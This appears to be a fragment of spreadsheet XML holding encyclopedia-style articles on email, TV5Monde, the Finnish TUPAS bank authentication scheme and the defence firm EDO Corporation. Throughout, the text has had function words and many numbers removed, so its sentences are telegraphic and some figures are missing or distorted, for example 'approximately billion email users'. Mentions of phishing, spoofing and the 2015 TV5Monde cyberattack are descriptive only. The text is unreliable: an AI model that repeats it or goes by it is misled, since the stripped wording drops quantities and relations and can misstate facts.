    <t>electronic mail (email e-mail) method exchanging messages ("mail") people using electronic devices. email thus conceived electronic (digital) version counterpart mail, time "mail" meant physical mail (hence mail). email later became ubiquitous (very widely used) communication medium, point current use, email address often treated basic necessary part many processes business, commerce, government, education, entertainment, spheres daily life countries. email medium, message sent therewith called email (mass/count distinction). email operates across computer networks, primarily internet, also local area networks. today's email systems based store-and-forward model. email servers accept, forward, deliver, store messages. neither users computers required online simultaneously; need connect, typically mail server webmail interface send receive messages download originally ascii text-only communications medium, internet email extended multipurpose internet mail extensions (mime) carry text character sets multimedia content attachments. international email, internationalized email addresses using utf-8, standardized widely adopted. terminology term electronic mail modern meaning since 1975, variations shorter e-mail since 1979: email common form, recommended style guides. form required ietf requests comments (rfc) working groups. this spelling also appears dictionaries. e-mail form favored edited published american english british english writing reflected corpus contemporary american english data, falling favor style guides. e-mail sometimes used. original usage june 1979 occurred journal electronics reference united states postal service initiative called e-com, developed late 1970s operated early 1980s. email also used. email used compuserve starting april 1981, popularized term. email traditional form used rfcs "author's address".the service often simply referred mail, single piece electronic mail called message. conventions fields within emails “to,” “from,” “cc,” “bcc” etc. began rfc-680 1975.an internet email consists envelope content; content consists header body. history computer-based messaging users system became possible advent time-sharing early 1960s, notable implementation mit's ctss project 1965. most developers early mainframes minicomputers developed similar, generally incompatible, mail applications. 1971 first arpanet network mail sent, introducing now-familiar address syntax symbol designating user's system address. over series rfcs, conventions refined sending mail messages file transfer protocol. proprietary electronic mail systems soon began emerge. ibm, compuserve xerox used in-house mail systems 1970s; compuserve sold commercial intraoffice mail product 1978 xerox 1981. dec's all-in-1 hewlett-packard's hpmail (later deskmanager) released 1982; development work former began late 1970s latter became world’s largest selling email system.the simple mail transfer protocol (smtp) protocol implemented arpanet 1983. email systems emerged 1980s. time late 1980s early 1990s, seemed likely either proprietary commercial system x.400 email system, part government open systems interconnection profile (gosip), would predominate. however, final restrictions carrying commercial traffic internet ended 1995, combination factors made current internet suite smtp, pop3 imap email protocols standard. operation following typical sequence events takes place sender alice transmits message using mail user agent (mua) addressed email address recipient. formats message email format uses submission protocol, profile simple mail transfer protocol (smtp), send message content local mail submission agent (msa), case smtp.a.org. determines destination address provided smtp protocol (not message header) case, bob@b.org fully qualified domain address (fqda). part sign local part address, often username recipient, part sign domain name. resolves domain name determine fully qualified domain name mail server domain name system (dns). server domain b.org (ns.b.org) responds records listing mail exchange servers domain, case mx.b.org, message transfer agent (mta) server recipient's isp. smtp.a.org sends message mx.b.org using smtp. this server need forward message mtas message reaches final message delivery agent (mda). delivers mailbox user bob. bob's picks message using either post office protocol (pop3) internet message access protocol (imap).in addition example, alternatives complications exist email system: alice client connected corporate email system, lotus notes microsoft exchange. these systems often internal email format clients typically communicate email server using vendor-specific, proprietary protocol. server sends receives email internet product's internet mail gateway also necessary reformatting. alice work company, entire transaction happen completely within single corporate email system. alice computer instead connect webmail service. alice's computer mta, avoiding transfer step pick email many ways, example logging mx.b.org reading directly, using webmail service. domains usually several mail exchange servers continue accept mail even primary available.many mtas used accept messages recipient internet best deliver them. such mtas called open mail relays. this important early days internet network connections unreliable. however, mechanism proved exploitable originators unsolicited bulk email consequence open mail relays become rare, many mtas accept messages open mail relays. message format basic internet message format used email defined 5322, encoding non-ascii data multimedia content attachments defined 2045 2049, collectively called multipurpose internet mail extensions mime. extensions international email apply email. 5322 replaced earlier 2822 2008, 2822 2001 replaced standard internet email decades. published 1982, based earlier arpanet.internet email messages consist sections, 'header' 'body'. these known 'content'. header structured fields from, subject, date, information email. process transporting email messages systems, smtp communicates delivery parameters information using message header fields. body contains message, unstructured text, sometimes containing signature block end. header separated body blank line. message header 5322 specifies syntax email header. each email message header (the "header section" message, according specification), comprising number fields ("header fields"). each field name ("field name" "header field name"), followed separator character ":", value ("field body" "header field body"). each field name begins first character line header section, begins non-whitespace printable character. ends separator character ":". separator followed field value (the "field body"). value continue onto subsequent lines lines space first character. field names and, without smtputf8, field bodies restricted 7-bit ascii characters. some non-ascii values represented using mime encoded words. header fields email header fields multi-line, line recommended characters, although limit characters. header fields defined 5322 contain us-ascii characters; encoding characters sets, syntax specified 2047 used. examples, ietf working group defines standards track extensions, replacing previous experimental extensions utf-8 encoded unicode characters used within header. particular, allows email addresses non-ascii characters. such addresses supported google microsoft products, promoted government agents.the message header must include least following fields: from: email address, and, optionally, name author(s). some email clients changeable account settings. date: local time date message written. like from: field, many email clients fill automatically sending. recipient's client display time format time zone local them.rfc 3864 describes registration procedures message header fields iana; provides permanent provisional field names, including also fields defined mime, netnews, http, referencing relevant rfcs. common header fields email include: email address(es), optionally name(s) message's recipient(s). indicates primary recipients (multiple allowed), secondary recipients bcc: below. subject: brief summary topic message. certain abbreviations commonly used subject, including "re:" "fw:". carbon copy; many email clients mark email one's inbox differently depending whether list. bcc: blind carbon copy; addresses usually specified smtp delivery, usually listed message header. content-type: information message displayed, usually mime type. precedence: commonly values "bulk", "junk", "list"; used indicate automated "vacation" "out office" responses returned mail, e.g. prevent vacation notices sent subscribers mailing list. sendmail uses field affect prioritization queued email, "precedence: special-delivery" messages delivered sooner. with modern high-bandwidth networks, delivery priority less issue was. microsoft exchange respects fine-grained automatic response suppression mechanism, x-auto-response-suppress field. message-id: also automatic-generated field prevent multiple deliveries reference in-reply-to: (see below). in-reply-to: message-id message reply used link related messages together. this field applies reply messages. references: message-id message reply message-id message previous reply reply etc. reply-to: address used reply message. sender: address sender acting behalf author listed from: field (secretary, list manager, etc.). archived-at: direct link archived form individual email message.the field unrelated addresses message delivered. delivery list supplied separately transport protocol, smtp, extracted header content. "to:" field similar addressing conventional letter delivered according address outer envelope. way, "from:" field sender. some mail servers apply email authentication systems messages relayed. data pertaining server's activity also part header, defined below. smtp defines trace information message saved header using following fields: received: smtp server accepts message, inserts trace record header (last first). return-path: delivery smtp server makes final delivery message, inserts field header.other fields added header receiving server called trace fields. authentication-results: server verifies authentication, save results field consumption downstream agents. received-spf: stores results checks detail authentication-results. dkim-signature: stores results domainkeys identified mail (dkim) decryption verify message changed sent. auto-submitted: used mark automatic-generated messages. vbr-info: claims whitelisting message body content encoding internet email designed 7-bit ascii. most email software 8-bit clean, must assume communicate 7-bit servers mail readers. mime standard introduced character specifiers content transfer encodings enable transmission non-ascii data: quoted printable mostly 7-bit content characters outside range base64 arbitrary binary data. 8bitmime binary extensions introduced allow transmission mail without need encodings, many mail transport agents support them. countries, e-mail software violates 5322 sending non-ascii text several encoding schemes co-exist; result, default, message non-latin alphabet language appears non-readable form (the exception coincidence sender receiver encoding scheme). therefore, international character sets, unicode growing popularity. plain text html most modern graphic email clients allow either plain text html message body option user. html email messages often include automatic-generated plain text copy compatibility. advantages html include ability include in-line links images, apart previous messages block quotes, wrap naturally display, emphasis underlines italics, change font styles. disadvantages include increased size email, privacy concerns bugs, abuse html email vector phishing attacks spread malicious software.some e-mail clients interpret body html even absence content-type: html header field; cause various problems. some web-based mailing lists recommend posts made plain-text, characters line reasons, significant number readers using text-based email clients mutt. some microsoft email clients allow rich formatting using proprietary rich text format (rtf), avoided unless recipient guaranteed compatible email client. servers client applications messages exchanged hosts using simple mail transfer protocol software programs called mail transfer agents (mtas); delivered mail store programs called mail delivery agents (mdas, also sometimes called local delivery agents, ldas). accepting message obliges deliver message cannot delivered, must send bounce message back sender, indicating problem. users retrieve messages servers using standard protocols imap, likely large corporate environment, proprietary protocol specific novell groupwise, lotus notes microsoft exchange servers. programs used users retrieving, reading, managing email called mail user agents (muas). when opening email, marked "read", typically visibly distinguishes "unread" messages clients' user interfaces. email clients allow hiding read emails inbox user focus unread.mail stored client, server side, places. standard formats mailboxes include maildir mbox. several prominent email clients proprietary format require conversion software transfer email them. server-side storage often proprietary format since access standard protocol imap, moving email server another done supporting protocol. many current email users mta, programs themselves, web-based email platform, gmail yahoo! mail, performs tasks. such webmail interfaces allow users access mail standard browser, computer, rather relying local email client. filename extensions upon reception email messages, email client applications save messages operating system files file system. some clients save individual messages separate files, others various database formats, often proprietary, collective storage. historical standard storage mbox format. specific format used often indicated special filename extensions: used many email clients including novell groupwise, microsoft outlook express, lotus notes, windows mail, mozilla thunderbird, postbox. files contain email contents plain text mime format, containing email header body, including attachments several formats. emlx used apple mail. used microsoft office outlook officelogic groupware. used opera mail, kmail, apple mail based mbox format.some applications (like apple mail) leave attachments encoded messages searching also saving separate copies attachments. others separate attachments messages save specific directory. scheme mailto scheme, registered iana, defines mailto: scheme smtp email addresses. though strictly defined, urls form intended used open message window user's mail client activated, address defined field. many clients also support query string parameters email fields, subject line carbon copy recipients. types web-based email many email providers web-based email client. this allows users email account using compatible browser send receive email. mail typically downloaded client, can't read without current internet connection. pop3 email servers post office protocol (pop3) mail access protocol used client application read messages mail server. received messages often deleted server. supports simple download-and-delete requirements access remote mailboxes (termed maildrop rfc's). pop3 allows download email messages local computer read even offline. imap email servers internet message access protocol (imap) provides features manage mailbox multiple devices. small portable devices like smartphones increasingly used check email traveling make brief replies, larger devices better keyboard access used reply greater length. imap shows headers messages, sender subject device needs request download specific messages. usually, mail left folders mail server. mapi email servers messaging application programming interface (mapi) used microsoft outlook communicate microsoft exchange server range email server products axigen mail server, kerio connect, scalix, zimbra, openmail, lotus notes, zarafa, bynari vendors added mapi support allow products accessed directly outlook. uses business organizational email widely accepted businesses, governments non-governmental organizations developed world, parts 'e-revolution' workplace communication (with plank widespread adoption highspeed internet). sponsored 2010 study workplace communication found u.s. knowledge workers felt email critical success productivity work.it benefits business organizations, including: facilitating logistics much business world relies communications people physically building, area, even country; setting attending in-person meeting, telephone call, conference call inconvenient, time-consuming, costly. email provides method exchanging information people set-up costs generally less expensive physical meeting phone call. helping synchronization with real time communication meetings phone calls, participants must work schedule, participant must spend amount time meeting call. email allows asynchrony: participant control schedule independently. batch processing incoming emails improve workflow compared interrupting calls. reducing cost sending email much less expensive sending postal mail, long distance telephone calls, telex telegrams. increasing speed much faster alternatives. creating "written" record unlike telephone in-person conversation, email nature creates detailed written record communication, identity sender(s) recipient(s) date time message sent. event contract legal dispute, saved emails used prove individual advised certain issues, email date time recorded possibility auto-processing improved distribution well pre-processing customer's orders and/or addressing person charge realized automated procedures. email marketing email marketing "opt-in" often successfully used send special sales offerings product information. depending recipient's culture, email sent without permission—such "opt-in"—is likely viewed unwelcome "email spam". personal personal computer many users access personal emails friends family members using personal computer house apartment. mobile email become used smartphones types computers. mobile "apps" email increase accessibility medium users homes. while earliest years email, users could access email desktop computers, 2010s, possible users check email away home, whether across town across world. alerts also sent smartphone devices notify immediately messages. this given email ability used frequent communication users allowed check email write messages throughout day. 2011, approximately billion email users worldwide billion non-spam emails sent daily.individuals often check emails smartphones personal work-related messages. found adults check email browse check facebook accounts, making email popular activity users smartphones. respondents study revealed check email phone. also found consumers smartphone check email, likely check email least smartphone. however, percentage consumers using email smartphone ranges differs dramatically across different countries. example, comparison consumers used india did. declining among young people 2010, number americans visiting email sites fallen percent peaking november 2009. persons number percent. young people preferred instant messaging, texting social media. technology writer matt richtel said york times email like vcr, vinyl records film cameras—no longer cool something older people do.a 2015 survey android users showed persons used messaging apps times much less likely email. issues attachment size limitation email messages attachments, additional files appended email. typical attachments include microsoft word documents, documents, scanned images paper documents. principle, technical restriction size number attachments. however, practice, email clients, servers, internet service providers implement various limitations size files, complete email typically 25mb less. furthermore, technical reasons, attachment sizes seen transport systems differ user sees, confusing senders trying assess whether safely send file email. where larger files need shared, various file hosting services available commonly used. information overload ubiquity email knowledge workers "white collar" employees concerns recipients face "information overload" dealing increasing volumes email. with growth mobile devices, default employees also receive work-related emails outside working day. this lead increased stress decreased satisfaction work. some observers even argue could significant negative economic effect, efforts read many emails could reduce productivity. spam email "spam" unsolicited bulk email. cost sending email meant that, 2003, total email traffic spam, threatening usefulness email practical tool. can-spam 2003 similar laws elsewhere impact, number effective anti-spam techniques largely mitigate impact spam filtering rejecting users, volume sent still high—and increasingly consists advertisements products, malicious content links. september 2017, example, proportion spam legitimate email rose 59.56%. percentage spam email 2021 estimated 85%. malware range malicious email types exist. these range various types email scams, including "social engineering" scams advance-fee scam "nigerian letters", phishing, email bombardment email worms. email spoofing email spoofing occurs email message header designed make message appear come known trusted source. email spam phishing methods typically spoofing mislead recipient true message origin. email spoofing done prank, part criminal effort defraud individual organization. example potentially fraudulent email spoofing individual creates email appears invoice major company, sends recipients. cases, fraudulent emails incorporate logo purported organization even email address appear legitimate. email bombing email bombing intentional sending large volumes messages target address. overloading target email address render unusable even cause mail server crash. privacy concerns today important distinguish internet internal email systems. internet email travel stored networks computers without sender's recipient's control. during transit time possible third parties read even modify content. internal mail systems, information never leaves organizational network, secure, although information technology personnel others whose function involve monitoring managing accessing email employees. email privacy, without security precautions, compromised because: email messages generally encrypted. email messages intermediate computers reaching destination, meaning relatively easy others intercept read messages. many internet service providers (isp) store copies email messages mail servers delivered. backups remain several months server, despite deletion mailbox. "received:"-fields information email often identify sender, preventing anonymous communication. bugs invisibly embedded html content alert sender email whenever email rendered html (some e-mail clients user reads, re-reads e-mail) address. also reveal whether email read smartphone apple device user agent string.there cryptography applications serve remedy above. example, virtual private networks network used encrypt traffic user machine safer network gpg, pgp, smemail, s/mime used end-to-end message encryption, smtp starttls smtp transport layer security/secure sockets layer used encrypt communications single mail smtp client smtp server. additionally, many mail user agents protect logins passwords, making easy intercept attacker. encrypted authentication schemes sasl prevent this. finally, attached files share many hazards found peer-to-peer filesharing. attached files contain trojans viruses. legal contracts possible exchange emails form binding contract, users must careful send email correspondence. signature block email interpreted satisfying signature requirement contract. flaming flaming occurs person sends message many messages) angry antagonistic content. term derived word incendiary describe particularly heated email discussions. ease impersonality email communications mean social norms encourage civility person telephone exist civility forgotten. email bankruptcy also known "email fatigue", email bankruptcy user ignores large number email messages falling behind reading answering them. reason falling behind often information overload general sense much information possible read all. solution, people occasionally send "boilerplate" message explaining email inbox full, process clearing messages. harvard university professor lawrence lessig credited coining term, popularized internationalization originally internet email completely ascii text-based. mime allows body content text header content text international character sets, headers email addresses using utf-8, standardized widely adopted. tracking sent mail original smtp mail service provides limited mechanisms tracking transmitted message, none verifying delivered read. requires mail server must either deliver onward return failure notice (bounce message), software bugs system failures cause messages lost. remedy this, ietf introduced delivery status notifications (delivery receipts) message disposition notifications (return receipts); however, universally deployed production.many isps deliberately disable non-delivery reports (ndrs) delivery receipts activities spammers: delivery reports used verify whether address exists indicates spammer available spammed. spammer uses forged sender email address (email spoofing), innocent email address used flooded ndrs many invalid email addresses spammer attempted mail. these ndrs constitute spam innocent user.in absence standard methods, range system based around bugs developed. however, often seen underhand raising privacy concerns, work email clients support rendering html. many mail clients default showing "web content". webmail providers also disrupt bugs pre-caching images. also notes references further reading external links iana's list standard header fields history email dave crocker's attempt capturing sequence 'significant' occurrences evolution email; collaborative effort also cites page. history electronic mail personal memoir implementer early email system look origins network email short, vivid recap historical facts business e-mail compromise emerging global threat, explained first principles, 2021 article attempting summarize rfcs</t>
  </si>
  <si>
    <t>Dye pack</t>
  </si>
  <si>
    <t>TV5Monde</t>
  </si>
  <si>
    <t>tv5monde (french pronunciation: ​[te sɛ̃k mɔ̃d]), formerly known tv5, french television network, broadcasting several channels french-language programming. approved participant member european broadcasting union.the network available across europe satellite astra 19.2°e eutelsat bird (13°e) (both free-to-air), online tvplayer. summary started january 1984 management serge adda death november 2004. next director since april 2005 jean-jacques aillagon, former french minister culture communication. director-general marie-christine saragosse. january 2006, underwent major overhaul, including rebranding "tv5monde" stress focus global network ("monde" french "world"). also, changes included schedule program line-up. since 1993, "tv5 monde" part channel's corporate name. canadian operations branded "tv5 québec canada", shorter version also used. history formed january 1984, guidance claude cheysson, french minister foreign affairs, president serge adda, five public television channels: tf1, antenne france, swiss télévision suisse romande belgian rtbf. name comes five public broadcasters. december 1985, amongst first four channels carried cable television france, inaugurated cergy-pontoise. following privatisation 1987, retired consortium continued supply programmes channel 1995. september 1988, québec canada created, followed afrique 1991. following year, transmitted using digital compression towards latin america caribbean. coverage expanded 1996 launch asian-pacific signal asie-pacifique subscription channel états-unis united states. years later, middle east feed launched moyen-orient 1998. early 1999, split european signal two, launch france belgique suisse, signal specific francophone europe (france, belgium, switzerland, monaco, luxembourg etc.). europe continued serve wider continental audience. consortium formed public channels arte cinquième entered capital channel, brought sources programming. schedule constructed, centred news programmes news flashes hour, bulletins rebroadcasts partners' main news programmes heures france soir france journal tsr/rts heures rtbf). meeting ministers vevey, switzerland, gave mandate channel's council co-operation reform structure channel view creating unique worldwide channel. national governments charge five participants gave agreement turn management états-unis amérique latine monde, name channel's head operations paris. from september attacks 2001 2003 iraq war, media coverage spotlight tv5's particular broadcasting news bulletins member public broadcasters. international conflicts arising decision united states united kingdom france notably refused participate relaunched debate whether create international news channel french perspective, resulting 2006 launch france with creation france placing tv5's existence doubt, ceo, jean-jacques aillagon decided january 2006 rename channel tv5monde underline status better international francophone channel available on-air (france available europe, middle east, africa united states cities york washington, french). aillagon stepped post march 2006. name tv5monde applies eight different signals, broadcast paris headquarters. canada, french-speaking quebec, quebec canada managed montreal, keeps original name tv5, operated independent company distinct tv5monde. well part family, quebec canada management schedule made canadian viewer mind conform canadian broadcast regulations, which, sets domestic production quotas limits foreign investors minority stake. 2007, programme schedule reduction programming france télévisions (france example, daily news bulletin france abandoning france midday news programme. 2008, tv5monde became part holding company france monde. 2009, tv5monde split asia-pacific signal two, tv5monde asie, feed territories located gmt+8 (hong kong) gmt+12 (new zealand). tv5monde's pacific signal adaptation existing asian signal adopted time zones serve viewers better. currently broadcasts oceania and, despite signal's name, japan, south korea south east asia. february 2015, signal tv5monde brésil launched broadcasting programming portuguese subtitles.monaco announced joining service upcoming public service broadcaster, monte-carlo riviera september 2022. april 2015 cyberattack resulting disruption evening april 2015, tv5monde victim cyberattack hacker group known "cybercaliphate", claimed ties terrorist organization islamic state iraq levant (isil). hackers breached broadcaster's internal systems director yves bigot described "unprecedented" attack, overriding tv5monde's broadcast programming three hours, service partially restored early hours following morning. normal broadcasting services still disrupted late april. various computerised internal administrative support systems including e-mail also still shut otherwise inaccessible attack. hackers also hijacked tv5monde's facebook twitter pages post personal information relatives french soldiers participating actions organization, along messages critical president françois hollande arguing january 2015 terrorist attacks "gifts" "unforgivable mistake" partaking conflicts "[serve] purpose".as part official response attack, french minister culture communications, fleur pellerin, called emergency meeting heads various major media outlets groups. meeting took place april undisclosed location. french prime minister manuel valls called attack unacceptable insult freedom information expression". colleague cabinet, interior minister bernard cazeneuve, attempted allay public concern stating france "had already increased anti-hacking measures protect cyber-attacks" since aforementioned terrorist attacks january earlier year, left total people dead.french investigators later discounted theory attack connected isil instead suspected apt28 pawn storm, hacking group alleged links russian government. investigators concluded attack test sorts cyberweaponry used switch power station ukraine.as result, airbus defence space implemented keelback cybersensor. content most content taken mainstream networks french-speaking world, notably france télévisions france, rtbf belgium, switzerland radio-canada networks canada. addition international news, tv5monde broadcasts ligue coupe france final, france nations matches, films music magazines. ownership number name number founding networks: télévision française (tf1), antenne (france (france (rts rtbf une). partnership making tv5monde consortium france télévisions, arte france, institut national l'audiovisuel, canadian broadcasting corporation, monte carlo riviera, télé-québec, rtbf rts. consortium owns service, owned france médias monde, holding company manages france's international broadcasting services. france télévisions: 46.42% france médias monde: 11.97% radio télévision suisse (rts): 10.53% radio-télévision belge communauté française (rtbf): 10.53% cbc/radio-canada (src): 6.32% monte carlo riviera (mcr): 5.26% télé-québec: 4.21% arte france: 3.12% institut national l'audiovisuel (ina): 1.65% channels eight feeds transmitted: tv5monde france belgique suisse monaco (france, belgium, switzerland, monaco, andorra luxembourg) tv5monde europe (rest europe) subtitles languages: french, english, german, dutch, romanian, russian, spanish. tv5monde afrique (africa except morocco, algeria, tunisia, libya egypt) tv5monde maghreb–orient (maghreb, middle east) occasional arabic subtitles tv5monde asie–pacifique (asia pacific oceania) tv5monde états-unis (united states) occasional english subtitles* tv5monde amérique latine caraïbes (latin america caribbean) occasional spanish portuguese subtitles québec canada (canada)**(*)tv5monde états-unis certain programs subtitled english, particularly newscasts movies. unusual watch french movie without english language subtitles tv5monde états-unis. (**)tv5 québec canada produced montreal. logos from 1984, television network, five different logos. first logo television network used 1984 1988, second logo used 1988 1990, third logo used 1990 1995, fourth logo used 1995 2006, fifth current logo 2006. from 1991 2003, digital on-screen graphic located upper right corner screen. from 2003 onwards, moved upper left corner screen dropped upper right corner. network availability europe tv5monde fbsm tv5monde europe free-to-air received satellite. additionally: croatia: tv5monde europe found digital cable. denmark: tv5monde europe found digital cable. germany: tv5monde europe found analogue digital cable. greece: tv5monde europe found channel ireland: tv5monde europe found virgin media ireland channel israel: tv5monde europe found channel 131. italy: tv5monde europe found italia channel iptv infostrada tiscali alice home channel number fastweb channel netherlands: tv5monde europe ziggo: channel (sd) française ziggo caiway: channel (hd), delta: channel (sd) canal digitaal: channel (sd) kabel noord: channel (sd) t-mobile: channel (hd) tv5monde fbsm canal digitaal: channel (hd) norway: tv5monde europe found canal digital channel 152. romania: tv5monde europe found dolce channel 116. romania digital, available channel 721, mediabox lcn. spain: tv5monde europe found (spain) cable channel channel 201. turkey: tv5monde europe found digiturk channel turkish cable television. united kingdom: tv5monde europe could found english subtitles virgin media cable channel 825; free-to-air satellite astra 19.2°e eutelsat bird 13°e. january 2019, monde ceased broadcasting freesat platform astra north america neither tv5monde supplementary services free-to-air north america. canada canada french canadian version tv5monde offers largely programming schedule, programming radio-canada, already available across canada, replaced content provincial educational networks télé-québec tfo. tv5monde, québec canada also co-operative effort involving french canadian networks producers l'association producteurs films télévision québec. canadian license also includes unis, channel focused francophone communities outside quebec. united states united states, tv5monde états-unis several foreign-language premium channels offered international media distribution. broadcast standard definition only. channel offered nationwide dish network, at&amp;t u-verse verizon fios offered major markets traditional cable systems charter spectrum, communications, xfinity bright house networks. tv5monde offered cable satellite carte selection $9.99 month. systems, subscription another programming tier digital cable package required. purportedly underfunding, tv5monde cannot offer accurate advance scheduling on-time programming, progress made fronts. addition, tv5monde états-unis offers french-language children's channel, tivi5monde, offers selection children's young adult programming french. channel currently available dish network, part tv5monde subscription. daily blocks tivi5monde programming also seen main tv5monde channel.tv5monde launched tv5monde cinema demand, video demand service available xfinity subscribers july 2013 features selection francophone films. mexico, central america caribbean mexico countries central america caribbean, tv5monde amérique latine caraïbes available méxico, satellite television platform, channel 277. south america brazil brazil transmitted subtitles portuguese schedule. negotiations currently held launch first original channel productions country. tv5monde brésil available brasil channel 108, claro channel 132, channel well vivo other countries tv5monde amérique latine caraïbes free-to-air south america. channel available main pay-tv operators hispanic countries, programming subtitled spanish. french guiana, french overseas territory northern south america, channel free broadcast programming entirely french. asia, australia zealand channel free asiasat satellite, covering asia australia. triangle auckland, nepal (everest) wellington rebroadcasts news programmes. nepal (everest), tivi5 monde broadcast dish home channel d-864. singapore, starhub service broadcasts channel digital service customers mediacorp channel mediacorp hd5. tv5monde asie available television providers bangladesh. australia, multilingual broadcaster broadcasts network news bulletin monde français every part worldwatch programming. india, network provides channel dish network services subscribers. also, many others like hathway cable local cable operators offer tv5monde free cost. channel also available japan fuji television platform tv5monde pacifique though japan part asia) television zealand zealand. south korea, provider qrix offers premium cable package. middle east north africa region, tv5monde maghreb-orient available nilesat badr frequencies 11900.00 27500 12073.00 27500 3/4, respectively. lebanon, also available cablevision, cable television platform serving country, tele liban's french channel, tele liban neuf. high-definition (hd) broadcasting tv5monde fbsm started july 2015 satellite canalsat upscaled feed. march 2017, feed changed upscaled native (1440x1080). tv5monde maghreb-orient broadcast since march 2014 badr-4. tv5monde asie broadcast taiwan since september 2014 singapore starhub since october 2015. also tivi5 monde denise epoté, head tv5monde africa references external links official site french) québec canada french) tv5monde tv5monde asia tv5monde charter french)</t>
  </si>
  <si>
    <t>TUPAS</t>
  </si>
  <si>
    <t>tupas strong digital authentication method created federation finnish financial services. tupas identification facto standard digital identification finland. used major finnish banks including aktia, osuuspankki, nordea, danske bank s-pankki (formerly tapiola). furthermore, tupas used also finnish government kansaneläkelaitos finnish administration site vero.fi. phasing tupas began 2016. final deadline shut identification services september 2019, banks continued providing service past date. traficom issued warning monetary penalties collected services shut november 2019, ultimately warned services using tupas strong authentication would shut down.tupas based finnish strong electronic identification digital signatures. requires strong identification methods include least three following identification methods. password similar knows, chipcard similar possesses, fingerprint similar unique person.commonly identification done using password list single-use passcodes passcode device. tupas operated finnish banks, required service providers negotiate contracts perform integrations separate bank deal with. real competition existed, tupas authentication expensive service providers. eidas regulations provided government opportunity open services market competition. end, finnish authorities established finnish trust network (ftn), framework allows strong authentication service brokers resell solutions finland using single standardised service contract. these brokers intermediaries identity providers (banks telecom operators) online service providers, enables operate 'one-stop-shop' resellers eids, well giving capacity manage contracts technical integrations. this competitive environment removed main obstacles developing strong identification services capping transaction costs bank broker eliminating administrative hurdles, single contract serving finnish banks streamlining integration, standard technical interface requiredtraficom recommended organizations broker instead directly connecting providers. references external links http://www.fkl.fi/en/themes/e-services/tupas/pages/default.aspx</t>
  </si>
  <si>
    <t>EDO Corporation</t>
  </si>
  <si>
    <t>corporation american company acquired corporation 2007. designed manufactured products defense, intelligence, commercial markets, provided related engineering professional services. employed 4,000 people worldwide revenues $715 million 2006. edo's assets went defense electronics services. 2015, assets part harris corporation, since june 2019 l3harris technologies. history earl dodge osborn founded aircraft corporation 1925. company's first successful product line pontoons floatplanes. with outbreak world company's focus shifted, began provide subassemblies military aircraft. this shift emphasis company renamed corporation november 1947. became public company 1956 listing american stock exchange, moved york stock exchange 1983. agreement reached september 2007 corporation $1.7 billion. after shareholders' approval, deal closed finalized december 2007. january 2011, corporation board directors approved plan split company. october 2011, corporation spun defense water technology businesses form three separate, publicly traded companies. exelis, inc. spin-off contained subsidiary. 2015, harris corp. announced acquisition exelis, inc. remains subsidiary; however, owner changed. company structure edo's resources aligned reporting segments, electronic systems communications engineered systems services, serving market sectors: (command, control, communications, computers) command, control, communications, computers (c4) sector includes business units: antenna products technologies communications networking systems. edo's antenna business custom designs antennas military platforms satellites. this includes military airborne, military shipboard, military ground, commercial wireless, commercial aviation, advanced technology integrated/custom antennas. communications networking systems business unit designs integrates voice data communications equipment end-to-end network solutions. 1992, corporation purchased antenna manufacturer dorne margolin. electronic warfare electronic warfare sector includes three business units: communications countermeasures systems, defense systems, reconnaissance surveillance systems. communications countermeasures systems (ccs) business unit develops electronic protection technology. products developed include shortstop electronic protection system (seps) military civilian applications, data link validation system (dlvs) validating testing military data links, wideband secure voice equipment (wsve) secure voice radio transmission. defense systems business unit designs manufactures high-performance electronic assemblies military space applications, develops produces electromechanical systems equipment government commercial marine aircraft applications. primary product areas include electronic warfare systems, radar systems, embedded systems, rf/microwave products, quality monitoring, nuclear detection, manufacturing services. reconnaissance surveillance systems business unit designs manufactures electronic warfare (ew) signal intelligence (sigint) systems products. manufactures integrated systems, antennas, receivers, digitizers, signal processors, signal analysis software packages elint, esm, ecm, sigint applications. integrated systems structures integrated systems structures sector includes business units: defense systems, (uk) ltd., fiber innovations, fiber science, mtech artisan, specialty plastics. defense systems business unit designer manufacturer electronic assemblies military space applications, development production electromechanical systems equipment government commercial marine aircraft applications. area interest falls within sector includes aircraft armament systems unit. (uk) includes technology brighton designs, develops manufactures weapon interfacing (carriage release) systems, cable assemblies electrodynamic products aerospace defense industries. firm makes zero retention force arming unit. fiber innovations business unit develops manufactures composite structures aerospace, defense commercial industries. this includes shaped preform assemblies using braiding woven fabrics, resin transfer molding (rtm) vacuum assisted resin transfer molding (vartm). fiber science designs manufactures lightweight advanced fiber-reinforced composite products. this includes designing producing composite structures using latest filament winding, laminating, resin-transfer-molding (rtm), autoclave cure processing. mtech product line consists controller electronics mil-std-1760 multiple carriage weapon suspension release equipment, controller electronics weapon systems, related electronic subsystems, customized simulators test sets. artisan advertised products include, zero retention force arming units, helicopter blade crack indicators, programmable power supplies, first products (the arming unit) actually manufactured technology ltd. specialty plastics supplier advanced composite piping systems marine offshore platform applications. intelligence information warfare intelligence information warfare sector includes three business units: nexgen, evi, impact science technology. nexgen develops, deploys, supports custom end-to-end solutions u.s. government organizations. core competencies include systems engineering, systems integration, design development custom hardware software, operational support. edo-evi focuses mission-driven research development custom communication systems u.s. government. specializes rapid development prototyping hardware software systems. edo-ist (impact science technology) provides signals intelligence (sigint) systems analysis support intelligence community, advanced countermeasures electronic systems government agencies. professional engineering services professional engineering services sector includes three business units: acquisition logistics management operations, edo-cas, technical services operations. acquisition logistics management operations business unit provides advanced technology solutions, training performance aids, acquisition logistics, strategic business solutions, warfare experimentation analysis engineering services. edo-cas business unit provides engineering services, logistics support weapons-systems analysis u.s. department defense. technical services operations business unit provides electronic warfare engineering, systems maintenance, flight test support services united states force. undersea warfare undersea warfare sector includes three business units: defense systems, electro-ceramics, naval communications sonar system. defense systems designer manufacturer electronic assemblies military space applications, development production electromechanical systems equipment government commercial marine aircraft applications. area interest falls within sector includes shallow water influence minesweep system (swims). electro-ceramics business unit provides ceramic-based products defense aerospace applications. these include underwater acoustic transducers arrays navigation communication sonars navy prime contractors, seismic offshore exploration, industrial positioning actuation, medical devices. naval communications sonar systems product line includes underwater acoustic products, surface ship command control combat systems integration, data link products, shore-based command control systems, information management systems (ims). corporate governance edo's board directors adopted corporate governance guidelines charters board committees. these documents, together company's ethical business guide, foundation edo's corporate governance business conduct practices. board reviews governance guidelines committee charters least annually ensure maintains improves practices. edo's director dennis blair. dennis blair's membership board directors corporation, subcontractor f-22 raptor fighter program, ownership stock raised potential conflict interest institute defense analyses issued study endorsed three-year contract program. blair told washington post, review affected association corp., report good one." originally chose recuse link sufficient "scale" require subsequently resigned board avoid misperceptions. however, wednesday, december 2006 washington post reported department defense inspector general's investigation affair found blair certainly violated conflict interest rules. criticism united states 2004 fine 2004 corporation ordered fine $2.5 million. this matter related activities former condor systems company, acquired assets condor systems 